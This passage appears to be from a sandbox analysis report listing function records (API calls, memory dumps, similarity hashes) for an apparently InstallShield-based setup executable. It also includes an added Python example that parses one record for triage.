  • Part of subcall function 004146A1: SetErrorMode.KERNEL32(00008003,?,?,00411A59,?,00000400,00000000,00000000,00000001,0000044F,00000000,000008A8,0041C4B5,00000452,?,00000218), ref: 004146D0
  • Part of subcall function 004146A1: GetWindowsDirectoryW.KERNEL32(?,?,?,?,00411A59,?,00000400,00000000,00000000,00000001,0000044F,00000000,000008A8,0041C4B5,00000452,?), ref: 004146E7
  • Part of subcall function 004146A1: lstrcpyW.KERNEL32 ref: 00414704
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: lstrcpy$DirectoryErrorH_prolog3H_prolog3_InfoModePathSystemTempVersionWindowslstrlen
• String ID: HsG$lMJ$|LJ
• API String ID: 4123192341-2286947246
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 004308C1
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004309D3
  • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: H_prolog3H_prolog3_Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: %.1f$HsG
• API String ID: 843513741-789691752
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 00455A99
  • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
  • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
  • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
  • Part of subcall function 00455724: __EH_prolog3_GS.LIBCMT ref: 0045572E
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorH_prolog3Last$H_prolog3_
• String ID: *.*$HsG$HsG
• API String ID: 2324316964-2570185586
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 004306B2
  • Part of subcall function 00416CC5: __EH_prolog3_GS.LIBCMT ref: 00416CCC
  • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
  • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
  • Part of subcall function 0041B2AF: __EH_prolog3_GS.LIBCMT ref: 0041B2B6
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorLast$H_prolog3_$FreeString
• String ID: %d $HsG$HsG
• API String ID: 1274762985-377422403
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00436A7A
  • Part of subcall function 004352C7: __EH_prolog3_catch.LIBCMT ref: 004352CE
  • Part of subcall function 004352C7: lstrcmpW.KERNEL32(00000008,00483E18,?,?,00483E18,00000008,?,00000004,004374EE,Startup,Source,00000001,?,00000400,00000452), ref: 004352F6
  • Part of subcall function 004432A1: _malloc.LIBCMT ref: 004432B9
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3_H_prolog3_catch_malloclstrcmp
                                                                                                                                                                          • String ID: Creating setup dialog...$Startup$session.cpp
                                                                                                                                                                          • API String ID: 43970051-4223746603
                                                                                                                                                                          • Opcode ID: 3977b8220eeff80297cc7d0f9cb8b60aea7369490cb5a6814a124e873e3d95ce
                                                                                                                                                                          • Instruction ID: 3705f9e300d2379c01e5196789dacb2d5c3074fc69e31bb8ddc8666f9f3badcb
                                                                                                                                                                          • Opcode Fuzzy Hash: 3977b8220eeff80297cc7d0f9cb8b60aea7369490cb5a6814a124e873e3d95ce
                                                                                                                                                                          • Instruction Fuzzy Hash: 9B516E70A01218ABDB15EB61CC59BDDB7B8AB14304F4042EEE109B71D1EB785F84CF99
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0042F62A
  • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
  • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0042F6B0
• SendMessageW.USER32 ref: 0042F6F7
  • Part of subcall function 00417579: __EH_prolog3_GS.LIBCMT ref: 00417583
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$FreeH_prolog3_MessageSendString
• String ID: HsG
• API String ID: 2788794003-1835203436
• Opcode ID: 94f50e6d8f92fa969d364990841f392c4675c5822ffff284fddaf107317d05c1
• Instruction ID: b725feb4ec8d194e398a384c829926952ea281141b596d57439f454a1716253e
• Opcode Fuzzy Hash: 94f50e6d8f92fa969d364990841f392c4675c5822ffff284fddaf107317d05c1
• Instruction Fuzzy Hash: 00418A71900228EFEB14DBA4CC85BDEBB78BF45304F50406EE501B7292DB786A49CF69
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0042600B
  • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
  • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
  • Part of subcall function 00424E4C: __EH_prolog3_GS.LIBCMT ref: 00424E56
  • Part of subcall function 00424E4C: VariantChangeType.OLEAUT32(?,?,00000000,00000002), ref: 00424EA0
  • Part of subcall function 00424E4C: VariantClear.OLEAUT32(?), ref: 0042506F
• _memset.LIBCMT ref: 004260D9
  • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
  • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
  • Part of subcall function 004036A0: GetLastError.KERNEL32(CC858012,?,?,?,?,004711A8,000000FF), ref: 004036E2
  • Part of subcall function 004036A0: SetLastError.KERNEL32(?,00000000,00000000,000000FF,?,?,?,?,004711A8,000000FF), ref: 0040373E
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$FreeH_prolog3_StringVariant$ChangeClearType_memset
• String ID: HsG$Version
• API String ID: 751381712-812662942
• Opcode ID: fd2462aab33620e3494a149f507e5cc0015ab673c532163865a763c619efff3b
• Instruction ID: d5247dfb82dfac2e0cba8f72930b02dc08d244023f8943c55c41bf66034df27b
• Opcode Fuzzy Hash: fd2462aab33620e3494a149f507e5cc0015ab673c532163865a763c619efff3b
• Instruction Fuzzy Hash: A2518070905218AEDB60DB60CC99BDEB7B8AF14304F5001EAA10DB71D1EB785F88CF95
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00406350: SysAllocStringLen.OLEAUT32(00000000,?), ref: 00406399
  • Part of subcall function 00406350: _memmove.LIBCMT ref: 004063C1
  • Part of subcall function 00406350: SysFreeString.OLEAUT32(00000000), ref: 004063D1
• _memmove.LIBCMT ref: 00406205
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: String_memmove$AllocFree
• String ID: HsG$invalid string position$string too long
• API String ID: 105348488-4059347116
• Opcode ID: b06d3ec4792a8a70b45f05350074a3fa66d35ebd0bc6f41ad112a431ba622d2d
• Instruction ID: b6540d861efc792820843319168a3ae34e3a809f59c9f477f0ab1d6f2e1bb576
• Opcode Fuzzy Hash: b06d3ec4792a8a70b45f05350074a3fa66d35ebd0bc6f41ad112a431ba622d2d
• Instruction Fuzzy Hash: 3031E2323043149BC724EEACE88081AB3EAEFD57143214A7FE513DB291DB35E955C7A9
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00411C48
  • Part of subcall function 00411FFD: __EH_prolog3_GS.LIBCMT ref: 00412004
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: H_prolog3_
• String ID: MsiVersion
• API String ID: 2427045233-1669961159
• Opcode ID: 8a7472359058eba9b14699442dd69798f1fc4de84322e3eecac7ed08f4a41a95
• Instruction ID: eb2aa746a39e8e660e2debb9262a4bd86d39c325c9c6ec037d28a9dd444163f4
• Opcode Fuzzy Hash: 8a7472359058eba9b14699442dd69798f1fc4de84322e3eecac7ed08f4a41a95
• Instruction Fuzzy Hash: 4C317971A00318EFDF14DBA4DC85BDD7379AF45304F1040ABE609AB192EB789E85CB69
Uniqueness
Uniqueness Score: -1.00%

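The function records above all follow one layout (an APIs list with "Part of subcall function" nesting, then Strings, Memory Dump Source, Similarity and Uniqueness fields). When a report carries hundreds of them, reading the API usage by eye is slow; the following added example, written for this page and not part of the sandbox report, parses one record into structured fields so the direct imports, the arguments passed to a given API, and the string / hash identifiers can be queried. The sample record is the SendMessageW record copied from this listing; the regular expressions assume the report's layout as shown here (bullet "•", "ref: " followed by an 8-digit hex address, strings joined with "$") and the helper names are this example's own.

```python
"""Parse a sandbox function record (APIs / Strings / Memory Dump Source /
Similarity / Uniqueness) into structured fields for triage.

Added example for this page; not part of the sandbox report. The record
layout is taken from the report itself; function and field names are ours.
"""
import re

# Constructed sample: one record copied from this report (the function whose
# prologue is at 0042F62A). Indented lines are calls made from a sub-function.
SAMPLE_RECORD = """\
APIs
• __EH_prolog3_GS.LIBCMT ref: 0042F62A
  • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
  • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0042F6B0
• SendMessageW.USER32 ref: 0042F6F7
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$FreeH_prolog3_MessageSendString
• String ID: HsG
• API String ID: 2788794003-1835203436
• Instruction Fuzzy Hash: 00418A71900228EFEB14DBA4CC85BDEBB78BF45304F50406EE501B7292DB786A49CF69
Uniqueness
Uniqueness Score: -1.00%
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Similarity", "Uniqueness"}

# One API call line. The argument list is optional; the comma before "ref:"
# appears only when arguments are present (layout as seen in this report).
API_RE = re.compile(
    r"^•\s+(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s+)?"
    r"(?P<name>[^\s.(]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]{8})$"
)
KV_RE = re.compile(r"^(?:•\s+)?(?P<key>[^:]+):\s*(?P<val>.*)$")


def parse_record(text):
    """Return {'apis': [...], 'fields': {...}, 'strings': [...], 'uniqueness_score': float|None}.

    Raises ValueError on an API line that does not match the report's layout,
    so a silently skipped call cannot hide an import during triage.
    """
    rec = {"apis": [], "fields": {}, "strings": [], "uniqueness_score": None}
    section = None
    for raw in text.splitlines():
        line = raw.strip()           # indentation is redundant with "Part of subcall"
        if not line:
            continue
        if line in SECTIONS:
            section = line
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if not m:
                raise ValueError("unparsed API line: %r" % line)
            args = m.group("args").split(",") if m.group("args") is not None else []
            rec["apis"].append({
                "name": m.group("name"), "module": m.group("module"),
                "args": args, "ref": m.group("ref"), "subcall_of": m.group("sub"),
            })
        elif section in ("Memory Dump Source", "Similarity", "Uniqueness"):
            m = KV_RE.match(line)
            if not m:
                continue
            key, val = m.group("key").strip(), m.group("val").strip()
            if key == "Uniqueness Score":
                rec["uniqueness_score"] = float(val.rstrip("%"))
            elif key == "Associated":          # one line per associated dump
                rec["fields"].setdefault("Associated", []).append(val)
            else:
                rec["fields"][key] = val
                if key == "String ID":          # the report joins strings with '$'
                    rec["strings"] = val.split("$")
        # "Strings" section: empty in every record on this page, so nothing to parse.
    return rec


def direct_calls(rec):
    """'MODULE!Name' for calls made in the function body itself, not via sub-functions."""
    return sorted({"%s!%s" % (a["module"], a["name"])
                   for a in rec["apis"] if a["subcall_of"] is None})


def calls_with_args(rec, name):
    """Argument lists recorded for every call of `name`, direct or via sub-function."""
    return [a["args"] for a in rec["apis"] if a["name"] == name]


if __name__ == "__main__":
    r = parse_record(SAMPLE_RECORD)
    print("direct imports:", direct_calls(r))
    print("SendMessageW args:", calls_with_args(r, "SendMessageW"))
    print("strings:", r["strings"], "score:", r["uniqueness_score"])
```

Splitting direct calls from sub-function calls matters when you compare records: the "API ID" field is built from the direct calls only, so two records that share sub-functions (the GetLastError/SetLastError wrapper at 00402580 appears under most records here) still get different IDs, and a parsed record lets you check that rather than trust the summary field.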
APIs
• __EH_prolog3_GS.LIBCMT ref: 00458FA3
  • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
  • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
  • Part of subcall function 00401410: GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 00401434
  • Part of subcall function 00401410: RegCloseKey.ADVAPI32(00000000), ref: 00401497
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000008,00000000,?,0000005C,0041CC00,?,-80000001,?,?), ref: 00459018
  • Part of subcall function 0040F49C: __EH_prolog3.LIBCMT ref: 0040F4A3
  • Part of subcall function 0040F441: SysStringLen.OLEAUT32(?), ref: 0040F44E
  • Part of subcall function 0040F441: SysReAllocStringLen.OLEAUT32(?,00000001,?), ref: 0040F468
  • Part of subcall function 00454E0F: RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,?,00000000,?,0045905C,00000000,?,?,?,?), ref: 00454E30
  • Part of subcall function 0040C92C: __EH_prolog3_GS.LIBCMT ref: 0040C933
  • Part of subcall function 0040C92C: GetLastError.KERNEL32(00000038,00417D0B), ref: 0040C93A
  • Part of subcall function 0040C92C: SetLastError.KERNEL32(00000000), ref: 0040C990
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorLast$H_prolog3_QueryStringValue$AllocCloseH_prolog3HandleModule
• String ID: HsG$HsG
• API String ID: 2251186408-815662401
• Opcode ID: dae28259d520293968fb04570947654750b5514f700a05bdd20f4997be0e20d0
• Instruction ID: b37b129affbe31bd5429d2c9211d6256549548be9fb3c8ec7d67064aba96ee76
• Opcode Fuzzy Hash: dae28259d520293968fb04570947654750b5514f700a05bdd20f4997be0e20d0
• Instruction Fuzzy Hash: E2311671800259DFCF15DF95C9919EEBBB8BF14348F50402EE905BB291EB74AA09CB94
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID:
• String ID: SeA
• API String ID: 0-2297079583
• Opcode ID: 9a014435fb7a29ee1691ccc022ab4662ecfc57e1d601f5aeffa1b74c7e6fb053
• Instruction ID: ecded04f1a918b666fb72c1e185211a9d048ff3ae9e53ee7ef177626206b62fe
• Opcode Fuzzy Hash: 9a014435fb7a29ee1691ccc022ab4662ecfc57e1d601f5aeffa1b74c7e6fb053
• Instruction Fuzzy Hash: 4A315271A00615AFCF14DF78C88499E77B9FF45354B12862AEC15A3250E774ED90CBD8
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3_catch_GS.LIBCMT ref: 00455911
  • Part of subcall function 00433743: __EH_prolog3.LIBCMT ref: 0043374A
  • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
  • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
  • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
  • Part of subcall function 00438C80: __EH_prolog3.LIBCMT ref: 00438C87
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
  • Part of subcall function 004339BD: __EH_prolog3.LIBCMT ref: 004339C4
• __CxxThrowException@8.LIBCMT ref: 004559D0
  • Part of subcall function 00442782: RaiseException.KERNEL32(?,?,00441450,00000000,?,?,?,?,00441450,00000000,00497AC0,?), ref: 004427D3
  • Part of subcall function 00433CE5: __EH_prolog3.LIBCMT ref: 00433CEC
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: H_prolog3$ErrorLast$FreeString$ExceptionException@8H_prolog3_catch_RaiseThrow
• String ID: $HsG
• API String ID: 1995314774-3130049038
• Opcode ID: 8132b7a09b97fe9a14408be9764c7954bd20cce4f3f6870cea61f619272fd66b
• Instruction ID: ace026071d227fde7325aab07702da409128d818eb9189e1942154cbed421e47
• Opcode Fuzzy Hash: 8132b7a09b97fe9a14408be9764c7954bd20cce4f3f6870cea61f619272fd66b
• Instruction Fuzzy Hash: 0A316071800258EADB10EFE0C895BED7B686F14308F54519FF80676283EBB85B4CDB69
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 00438C87
  • Part of subcall function 0043892B: __EH_prolog3_GS.LIBCMT ref: 00438935
  • Part of subcall function 0043892B: InterlockedDecrement.KERNEL32(00000000), ref: 00438945
  • Part of subcall function 0043892B: CloseHandle.KERNEL32(000000FF), ref: 0043896D
  • Part of subcall function 0043892B: __CxxThrowException@8.LIBCMT ref: 004389A6
  • Part of subcall function 004432A1: _malloc.LIBCMT ref: 004432B9
  • Part of subcall function 004432A1: std::exception::exception.LIBCMT ref: 004432D5
  • Part of subcall function 004432A1: __CxxThrowException@8.LIBCMT ref: 004432EA
• GetLastError.KERNEL32(000000FF,00000000,80400100,?,00000000,0045611E,0047C4E4,80000000,00000001,00000080,00000003,00000000,00000000,?,00000000,00000084), ref: 00438D62
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Exception@8Throw$CloseDecrementErrorH_prolog3H_prolog3_HandleInterlockedLast_mallocstd::exception::exception
• String ID: HsG$toys::file
• API String ID: 2011250969-664232986
• Opcode ID: 476c9e8b2e2575007c92ac349694369c87d6b1bfc873668b244331bd53e4beed
• Instruction ID: 8bb4dd54a4404eafffcec503ecdd22372bce14b72131dd46fb4a5f3b3d68be9a
• Opcode Fuzzy Hash: 476c9e8b2e2575007c92ac349694369c87d6b1bfc873668b244331bd53e4beed
• Instruction Fuzzy Hash: 4C21E270600305AFDF14AF718881A6EB7A2AF58358F10942FF5169B2D2DF7CDD019B29
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 004194B1
  • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
  • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
  • Part of subcall function 0040F49C: __EH_prolog3.LIBCMT ref: 0040F4A3
  • Part of subcall function 0040F441: SysStringLen.OLEAUT32(?), ref: 0040F44E
  • Part of subcall function 0040F441: SysReAllocStringLen.OLEAUT32(?,00000001,?), ref: 0040F468
• GetModuleFileNameW.KERNEL32(00000000,00000400,?,00000400), ref: 0041951B
  • Part of subcall function 0040C92C: __EH_prolog3_GS.LIBCMT ref: 0040C933
  • Part of subcall function 0040C92C: GetLastError.KERNEL32(00000038,00417D0B), ref: 0040C93A
  • Part of subcall function 0040C92C: SetLastError.KERNEL32(00000000), ref: 0040C990
  • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
  • Part of subcall function 0040F686: __EH_prolog3_GS.LIBCMT ref: 0040F690
  • Part of subcall function 004100B6: __EH_prolog3_GS.LIBCMT ref: 004100BD
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                            • Part of subcall function 00433A33: __EH_prolog3.LIBCMT ref: 00433A3A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3_String$H_prolog3$Free$AllocFileModuleName
                                                                                                                                                                          • String ID: HsG$ISSetup.dll
                                                                                                                                                                          • API String ID: 4249000290-2347869718
                                                                                                                                                                          • Opcode ID: e323ada1f3d8eeece09b36f658f68c50f8aa2246ef84f49a2be6745e8ffd3219
                                                                                                                                                                          • Instruction ID: 4e0496bd79c75e21839b58ea6c55a1a405bf68119e842e89425977022df559eb
                                                                                                                                                                          • Opcode Fuzzy Hash: e323ada1f3d8eeece09b36f658f68c50f8aa2246ef84f49a2be6745e8ffd3219
                                                                                                                                                                          • Instruction Fuzzy Hash: 0A318F71800158EACB11EBA5CC95BDEBB78BF55304F4080AEE10AB71D2DB781B49CB69
Uniqueness

Uniqueness Score: -1.00%

APIs
• _memset.LIBCMT ref: 004355CB
  • Part of subcall function 00411F19: __EH_prolog3_GS.LIBCMT ref: 00411F20
• wsprintfW.USER32 ref: 00435648
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: H_prolog3__memsetwsprintf
• String ID: %s/%s$Location
• API String ID: 2010508751-42320356
• Opcode ID: 623eb78449de06c9fc923b3259e1353a90a62daa14e54a208505cf88229414fe
• Instruction ID: 23866275a3071eba289bf9b220f73d8ac8661907e7f7e16146d8c925c51520d4
